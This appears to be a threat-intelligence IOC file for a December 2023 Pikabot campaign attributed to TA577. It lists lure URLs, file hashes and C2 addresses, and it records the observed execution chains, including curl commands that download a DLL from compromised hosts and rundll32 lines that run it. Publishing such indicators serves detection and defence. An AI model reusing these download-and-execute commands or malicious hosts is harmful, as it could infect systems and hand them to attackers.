-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathPikabot_19.12.2023.txt
167 lines (117 loc) · 8.83 KB
/
Pikabot_19.12.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
19.12.2023 | Pikabot | TA577 | 1.1.17-ghost
*************************************************
.url https://pros.cm/b9shs9/
.zip a8d0549b9288e5f98f085d17f062e6c4f95313bef262727af14983c144f3f8d6
.dll 1b62b7b138dbd3d6b8980e0257b3c35eefbde008b38cb23fb332044e8fc3f5c9
JS Loader Switch and .dll update - Wave 2 new exec
.url https://pm-law.co/wzo7e/
.zip 99d1faf7a53e5a52870cba26786808374ffa92a12f2f70dba237bbf0af3f9774
.dll cdefe04ff6ea56f6bd8d69648e9603a8ed6db07e90349592062ce1829693bbc5
*************************************************
Exe #1 - url > zip > js > curl > .dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\Decet.js
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://allengi.com.ng/QwN/0.021897107532453885.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://allengi.com.ng/QwN/0.021897107532453885.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://newsnarayan.com/N44a38c/0.9908375425521456.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://newsnarayan.com/N44a38c/0.9908375425521456.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://nacolnist.edu.np/8CwNbP/0.13824204127652134.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://nacolnist.edu.np/8CwNbP/0.13824204127652134.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://mrenterprises.tech/OUiujYU/0.047309185337448434.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://mrenterprises.tech/OUiujYU/0.047309185337448434.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://bajarangabali.com.np/OW8i/0.4591530178148502.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://bajarangabali.com.np/OW8i/0.4591530178148502.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://easycartbd.com/5pj6O/0.7525996060696272.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://easycartbd.com/5pj6O/0.7525996060696272.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
cmd.exe /c timeout 10 & rundll32 C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll,Enter
rundll32 C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll,Enter
cmd.exe /c mkdir C:\Okkjgjrgksmjf\Cjejglflgri & curl https://empreenda.vc/VjX/0.20412468885981988.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
curl https://empreenda.vc/VjX/0.20412468885981988.dat --output C:\Okkjgjrgksmjf\Cjejglflgri\Pwkfigjfegkks.dll
timeout 10
SearchProtocolHost.exe
WerFault.exe -u -p 3620 -s 992
WerFault.exe -pss -s 200 -p 3620 -ip 3620
*************************************************
Exec #2 - url > zip > js > curl > .dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\Novxa.js
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Novxa.js
cmd.exe /c echo|set /p="cu" > C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /S /D /c echo
cmd.exe /S /D /c set /p=cu 1> C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /c echo rl https://empreenda.vc/VjX/920408445 --output C:\Users\Admin\AppData\Local\Temp\sint.q --ssl-no-revoke --insecure --location >> C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
curl https://empreenda.vc/VjX/920408445 --output C:\Users\Admin\AppData\Local\Temp\sint.q --ssl-no-revoke --insecure --location
cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\eveniet.z.bat
cmd.exe /c ren C:\Users\Admin\AppData\Local\Temp\sint.q quo.k
rundll32.exe C:\Users\Admin\AppData\Local\Temp\quo.k Enter
*************************************************
**** .dll distro ****
https://bajarangabali.com.np/OW8i/0.4591530178148502.dat
https://nacolnist.edu.np/8CwNbP/0.13824204127652134.dat
https://newsnarayan.com/N44a38c/0.9908375425521456.dat
https://mrenterprises.tech/OUiujYU/0.047309185337448434.dat
https://allengi.com.ng/QwN/0.021897107532453885.dat
https://empreenda.vc/VjX/0.20412468885981988.dat
https://easycartbd.com/5pj6O/0.7525996060696272.dat
*************************************************
c2's
154.221.30.136:13724
149.28.100.66:5243
172.232.54.192:2224
78.141.200.111:5938
45.56.71.218:13724
65.20.85.39:2967
45.76.96.172:2223
154.211.12.126:2967
45.76.119.22:13724
172.232.189.166:1194
51.161.81.190:13721
https://154.221.30.136:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://149.28.100.66:5243/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://172.232.54.192:2224/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://78.141.200.111:5938/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://45.56.71.218:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://65.20.85.39:2967/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://45.76.96.172:2223/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://154.211.12.126:2967/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://45.76.119.22:13724/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://172.232.189.166:1194/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
https://51.161.81.190:13721/GarbureRustred/cOm3SjHPWZsK6N?GlazenUrticant=3xPYca&Fatidically=nRHPbgirYJD&Moutan=underlooker
155.138.140.156:13720
45.76.119.22:13724
64.176.13.28:2083
45.33.15.215:2967
172.232.188.4:2226
69.164.213.141:5631
70.34.196.219:2226
172.232.54.192:2224
154.211.12.126:2967
154.221.30.136:13724
95.179.247.197:13782
172.232.189.166:1194
45.56.71.218:13724
78.141.200.111:5938
208.76.221.253:13724
216.238.79.12:2221
78.141.223.212:1194
45.76.22.139:13786
149.28.100.66:5243
https://155.138.140.156:13720/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.76.119.22:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://64.176.13.28:2083/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.33.15.215:2967/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://172.232.188.4:2226/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://69.164.213.141:5631/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://70.34.196.219:2226/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://172.232.54.192:2224/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://154.211.12.126:2967/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://154.221.30.136:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://95.179.247.197:13782/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://172.232.189.166:1194/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.56.71.218:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://78.141.200.111:5938/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://208.76.221.253:13724/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://216.238.79.12:2221/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://78.141.223.212:1194/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://45.76.22.139:13786/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
https://149.28.100.66:5243/Pashaship/Y7FfckjVh26GlV7TK?geryonidCentripetal=Mc9DDT&colloquize=YRO0RvD&devilyTricosyl=CoronetedMatweed
*************************************************